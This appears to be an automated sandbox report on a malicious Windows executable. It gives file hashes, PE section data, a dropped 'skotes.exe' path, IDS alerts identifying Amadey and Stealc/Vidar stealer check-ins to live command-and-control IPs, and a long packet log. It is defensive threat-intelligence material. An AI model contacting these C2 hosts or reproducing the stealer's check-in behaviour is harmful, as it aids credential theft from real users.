                                                  SHA-256:DEB8B42416072A6BE8C2A0D957DB28F5C4A67AC707C4F5F20DA46EFE23D85D90
                                                  SHA-512:615C796734448621AA1692BD4E61F7B4B14772EFE50C157E8505030699B0299FA7C34DE2191E202F7678D96EC385EB82628C3CB91D4210542F2199177AAEE2B7
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................K...........@...........................K...........@.................................W...k.......D...................x.K.............................(.K..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..*.........................@...cldzocnb......1.....................@...rviyezxx......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................
                                                  Process:C:\Users\user\DocumentsIIEBGIDAAF.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):290
                                                  Entropy (8bit):3.4317403581008055
                                                  Encrypted:false
                                                  SSDEEP:6:yubX7L1UEZ+lX1CGdKUe6tkHs+Zgty0lB5l6t0:9r7BQ1CGAFBZgtVB76t0
                                                  MD5:736169EC8B175879A9156EEB5E68F8B4
                                                  SHA1:E86996A91223415E0AB4CD7A9940777A044CC74A
                                                  SHA-256:AF3C5DBB6FDF735A243ED6538B7C1164945779AC2C1722D3F7A4FA9EBC196C48
                                                  SHA-512:61A5BDB0270AF1A024DCC7B52F8A37D88B3AD13A994555CEF60F93F8AD1AD7135AB9EEE74277F64D54FB4292BD080875F91CB9CFA62B81E1F549618C02E86142
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.......-.TF.*.S/.~F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0...................@3P.........................
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.945103474038727
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:file.exe
                                                  File size:1'802'240 bytes
                                                  MD5:45a44e016967a33a277601951d2b5e0d
                                                  SHA1:b8597c8004c973d34b1c3a72d93525b53ae28f9e
                                                  SHA256:549d3d44e4c8d9d5af2df736001d57a5794e0ef9428ae90fe54a574739356435
                                                  SHA512:7a9fdd3988ad301076e3bfe1a995d0359f29cf3377b59d7e3a0738cf2207066e0a9784eb113e13c7e3d2e50f97381bbc1ae84d4f1c8d355ff509067a7eb8766e
                                                  SSDEEP:24576:/Rwlj6LZmpV2kF25LZlYUCzOBGANgyvyg6MK73EneriOV1Ns80m8OnoSF1WjyH:/eI9mp5FgLN8OBpggygtwuMiD8Vn5KW
                                                  TLSH:5C8533117DB0AAE6CCB846704743DB01BF3A8DBC52A9B0020F1E97AD5D757A77839C89
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0xa92000
                                                  Entrypoint Section:.taggant
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                  Instruction
                                                  jmp 00007F3778B0C93Ah
                                                  divps xmm3, dqword ptr [ebx]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add cl, ch
                                                  add byte ptr [eax], ah
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  Programming Language:
                                                  • [C++] VS2010 build 30319
                                                  • [ASM] VS2010 build 30319
                                                  • [ C ] VS2010 build 30319
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [LNK] VS2010 build 30319
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  0x10000x2490000x162008eb2fffe3816b6952028669369ee8335unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x24a0000x2b00x20038449154f57c7e888962646d06da254cFalse0.8046875data6.049065839608967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  0x24c0000x2a60000x200abdc8dc2d8369e0bbb8e328f4068b39dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  gxrwbqyp0x4f20000x19f0000x19e200b0c59bf408a483d03ddf972e0b08e385False0.9947213156504678OpenPGP Secret Key7.954289756415853IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  kfmupzhk0x6910000x10000x400a8d7e60d05e5a65824fefe6ff9177d2aFalse0.74609375data5.9312391186287945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .taggant0x6920000x30000x22006f255f7c7ab2428cf16a1771083c39b1False0.08823529411764706DOS executable (COM)0.9535313332306098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_MANIFEST0x68fdc80x256ASCII text, with CRLF line terminators0.5100334448160535
                                                  DLLImport
                                                  kernel32.dlllstrcpy
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-11-28T13:10:04.994826+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.849715TCP
                                                  2024-11-28T13:10:20.879149+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.849706185.215.113.20680TCP
                                                  2024-11-28T13:10:48.928209+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.849706185.215.113.20680TCP
                                                  2024-11-28T13:10:50.595613+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.849709185.215.113.20680TCP
                                                  2024-11-28T13:10:50.717588+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.849709TCP
                                                  2024-11-28T13:10:52.143290+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.849709185.215.113.20680TCP
                                                  2024-11-28T13:10:52.999060+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.849709185.215.113.20680TCP
                                                  2024-11-28T13:10:59.822058+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.849710185.215.113.1680TCP
                                                  2024-11-28T13:12:06.964987+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.849714185.215.113.4380TCP
                                                  2024-11-28T13:12:11.521406+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84971631.41.244.1180TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 28, 2024 13:10:15.165292025 CET4970680192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:15.285805941 CET8049706185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:15.285883904 CET4970680192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:15.286139965 CET4970680192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:15.406281948 CET8049706185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:16.636126041 CET8049706185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:16.636189938 CET4970680192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:16.638649940 CET4970680192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:16.758536100 CET8049706185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:20.877257109 CET8049706185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:20.879148960 CET4970680192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:20.880583048 CET4970680192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:21.000533104 CET8049706185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:48.928209066 CET4970680192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:48.930960894 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:49.213632107 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:49.213761091 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:49.214086056 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:49.334155083 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:50.595531940 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:50.595557928 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:50.595570087 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:50.595613003 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:50.595649004 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:50.595701933 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:50.595717907 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:50.595733881 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:50.595762968 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:50.595788002 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:50.597460032 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:50.717587948 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:51.045748949 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:51.045839071 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:51.063389063 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:51.063460112 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:51.183381081 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:51.183504105 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:51.183516979 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:51.183610916 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:51.183620930 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:51.183701992 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:51.183712006 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:52.143241882 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:52.143290043 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:52.405848026 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:52.525836945 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:52.996534109 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:52.999059916 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.092295885 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.092370987 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.092406034 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.092420101 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.092443943 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.092458963 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.092462063 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.092469931 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.092483044 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.092500925 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.092511892 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.092531919 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.092540979 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.092567921 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.092571020 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.092607975 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.092936039 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.092950106 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.092988968 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.093003988 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.093044043 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.093058109 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.093084097 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.093101978 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.093113899 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.093151093 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.093178988 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.093215942 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.093283892 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.093815088 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.093863964 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.119790077 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.119807005 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.119859934 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.213506937 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.213663101 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.213752985 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.216783047 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.216859102 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.216933966 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.225327969 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.225408077 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.225523949 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.233716011 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.233872890 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.233935118 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.242158890 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.242230892 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.242300987 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.250685930 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.250808001 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.250921011 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.259074926 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.259258032 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.259330034 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.267518997 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.267635107 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.267690897 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.276006937 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.276151896 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.276324034 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.284410000 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.284512043 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.284574986 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.292855024 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.292932987 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.292990923 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.301403999 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.301551104 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.301603079 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.309701920 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.309824944 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.309883118 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.334367990 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.334466934 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.334542036 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.338618994 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.338736057 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.338808060 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.347071886 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.347189903 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.347254038 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.355556965 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.355664015 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.355747938 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.364003897 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.364121914 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.364191055 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.372472048 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.372523069 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.372678995 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.372725964 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.380917072 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.380970001 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.381069899 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.381117105 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.389487982 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.389544964 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.389583111 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.389630079 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.397846937 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.397903919 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.397945881 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.397994041 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.406258106 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.406311035 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.406366110 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.406415939 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.412723064 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.412772894 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.412810087 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.412854910 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.418838978 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.418893099 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.418981075 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.419029951 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.424602032 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.424655914 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.424768925 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.424822092 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.430351973 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.430399895 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.430463076 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.430546999 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.435899019 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.435950994 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.436058998 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.436105967 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.441123962 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.441176891 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.441199064 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.441260099 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.441270113 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.446536064 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.446662903 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.446732998 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.451581955 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.451677084 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.451734066 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.456706047 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.456828117 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.456897974 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.461822987 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.461934090 CET8049709185.215.113.206192.168.2.8
                                                  Nov 28, 2024 13:10:53.462002039 CET4970980192.168.2.8185.215.113.206
                                                  Nov 28, 2024 13:10:53.467003107 CET8049709185.215.113.206192.168.2.8
